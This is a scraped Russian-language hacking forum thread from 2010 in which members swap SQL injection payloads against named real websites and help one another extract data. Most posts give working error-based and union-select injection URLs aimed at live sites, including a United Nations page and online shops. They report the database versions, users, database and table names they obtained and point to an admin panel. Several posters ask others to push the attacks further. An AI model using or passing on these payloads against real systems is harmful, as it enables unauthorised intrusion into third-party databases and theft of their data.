ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
01.01.2010, 08:24
|
|
Banned
Регистрация: 28.12.2009
Сообщений: 30
Провел на форуме:
58726
Репутация:
0
|
|
Блин, простите, работает. просто не павраильно имя таблицы написал...
|
|
|
01.01.2010, 14:29
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Нужно вначале назначить 2 значения.
Ну или так.
http://zero10.us/m.php?id=2435+and+1=(select+*+fro m(select+*+from+information_schema.tables+a+JOIN+i nf ormation_schema.tables+b)c)--
Последний раз редактировалось v1d0qz; 01.01.2010 в 17:16..
|
|
|
|
01.01.2010, 15:03
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Strilo4ka
Почему то не получаеться! Может у кого нить получиться:
Ошибка: .
у тебя в запросе сразу 2 ошибки: конечный подзапрос возвращает 2 пустых поля, из-за этого в первом подзапросе 1=(select * ... ) используются 2 колонки
квазар составил длинный пример на основе предыдущего способа вывода имен колонок, но его можно записать и покороче:
http://zero10.us/m.php?id=2435+or(1,2)=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
а ещё лучше переходить на другой способ:
http://zero10.us/m.php?id=2435+or(1,2)=(select+count(*),concat(vers ion(),floor(rand(0)*2))from(information_schema.tab les)+group+by+2)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
01.01.2010, 23:03
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /.1/www/www.site.ru/top.phtml on line 24
SQL запрос сделать при такой ошибке можно сделать? В запрос подставлил одинарную кавычку
|
|
|
|
01.01.2010, 23:48
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от v1d0qz
Больше шанса что это некорректная обработка, чем инжа. Чтобы сказат точно, нужно смотреть связку кода.
С чего ты взял, что это некорректная обработка? Вариантов много, и шансов нет никаких, пока нет самого сайта.
|
|
|
|
01.01.2010, 23:51
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
ok
http://www.bestwatch.ru/watches.phtml?idb=168&idl=2618
http://www.luxwatch.ru/watches.phtml?idb=168
|
|
|
|
01.01.2010, 23:57
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
скуля есть что в 1 что во 2 варианте и логические операции об этом хорошо говорят
Код:
http://www.luxwatch.ru/watches.phtml?idb=-168+union+select+version()
|
|
|
|
01.01.2010, 23:59
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Спасибо, оперативно вы..
|
|
|
|
03.01.2010, 17:30
|
|
Познающий
Регистрация: 18.03.2006
Сообщений: 47
Провел на форуме:
311345
Репутация:
9
|
|
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--
version(): 4.0.27-standard
user(): dbo273434928@localhost
database(): db273434928
Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)
jokester отредактировал мой пост в теме SQL Иньекций,поэтому постю сюда.У меня вопрос / прошения о помощи в этом случае.Кароче в первой ссылке вроде как 3 колонки но у меня ничего не получается вывести,кому не лень поиграйтесь с этой скулей плз.
|
|
|
|
03.01.2010, 17:49
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
Код:
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29--
Имя базы данных : News
Код:
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29--
Владелец : web
Код:
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--
Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
Теперь таблицы и колонки
Код:
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29--
Одна из таблиц: failedemails
А дальше сделать ничего не выходит. Никто не поможет? Может в том,что сделано ошибки есть?  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
